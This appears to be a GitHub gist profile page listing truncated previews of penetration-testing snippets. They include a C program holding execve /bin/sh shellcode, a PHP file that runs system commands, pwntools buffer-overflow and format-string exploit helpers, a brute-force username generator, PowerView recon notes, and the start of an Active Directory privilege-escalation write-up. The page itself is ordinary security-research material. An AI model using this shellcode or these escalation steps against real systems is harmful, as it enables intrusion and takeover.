Skip to content

Instantly share code, notes, and snippets.

View mohinparamasivam's full-sized avatar

Mohin Paramasivam mohinparamasivam

84 followers · 13 following
View GitHub Profile
@mohinparamasivam
mohinparamasivam / PatchClean.ps1
Created October 19, 2023 12:21 — forked from hugsy/PatchClean.ps1
PatchExtract.ps1 & PatchClean.ps1 from Greg Linares (all credits to @Laughing_Mantis)
<#
================
PATCHCLEAN.PS1
=================
Version 1.0 Patch Folder Cleaner by Greg Linares (@Laughing_Mantis)
This Tool will go through the patch folders created by PatchExtract.PS1 and look for files created older
than 30 days prior to the current date and move these to a sub folder named "OLD" in the patch folders.
@mohinparamasivam
mohinparamasivam / delta_patch.py
Created October 19, 2023 12:21 — forked from wumb0/delta_patch.py
a script for applying MS patch deltas
from ctypes import (windll, wintypes, c_uint64, cast, POINTER, Union, c_ubyte,
LittleEndianStructure, byref, c_size_t)
import zlib
# types and flags
DELTA_FLAG_TYPE = c_uint64
DELTA_FLAG_NONE = 0x00000000
DELTA_APPLY_FLAG_ALLOW_PA19 = 0x00000001
@mohinparamasivam
mohinparamasivam / test.php
Created December 10, 2022 04:19
<?php
echo system('whoami');
echo system('pwd');
?>
@mohinparamasivam
mohinparamasivam / shellcode.c
Created August 29, 2022 01:59 — forked from securitytube/shellcode.c
C Program to test shellcode
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
@mohinparamasivam
mohinparamasivam / namemash.py
Created August 19, 2022 00:54 — forked from superkojiman/namemash.py
Creating a user name list for brute force attacks.
#!/usr/bin/env python3
'''
NameMash by superkojiman
Generate a list of possible usernames from a person's first and last name.
https://blog.techorganic.com/2011/07/17/creating-a-user-name-list-for-brute-force-attacks/
'''
@mohinparamasivam
mohinparamasivam / certifried_with_krbrelayup.md
Created May 18, 2022 07:42 — forked from tothi/certifried_with_krbrelayup.md
Certifried combined with KrbRelayUp: non-privileged domain user to Domain Admin without adding/pre-owning computer accounts

Certifried combined with KrbRelayUp

Certifried (CVE-2022-26923) gives Domain Admin from non-privileged user with the requirement adding computer accounts or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (aka owning) the machine. Combination of these two: non-privileged domain user escalating to Domain Admin without the requirement adding/owning computer accounts.

The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.

Prerequisites:

@mohinparamasivam
mohinparamasivam / PowerView-3.0-tricks.ps1
Created April 23, 2022 13:47 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@mohinparamasivam
mohinparamasivam / finding_offset.py
Created September 20, 2021 13:00 — forked from 0xswitch/finding_offset.py
Find offset for buffer overflow vulnerability with pwntools
from pwn import *
elf = ELF("./vuln")
p = process("./vuln")
p.sendline(cyclic(200, n=8))
p.wait()
core = p.corefile
@mohinparamasivam
mohinparamasivam / FormatStringBugAutopwn
Created July 5, 2021 07:21 — forked from hexnickk/FormatStringBugAutopwn
Format String Bug exploitation with pwntools example
#!/usr/bin/python2.7
import argparse
import re
import pwnlib
def execute_with_payload(binary_name, payload):
ans = ""
proc = pwnlib.tubes.process.process(
@mohinparamasivam
mohinparamasivam / nessus_merger.py
Created March 24, 2021 02:52 — forked from btoews/merger.py
Merging Nessus Files
# file: merger.py
# based off: http://cmikavac.net/2011/07/09/merging-multiple-nessus-scans-python-script/
# by: mastahyeti
import xml.etree.ElementTree as etree
import shutil
import os
first = 1
for fileName in os.listdir("."):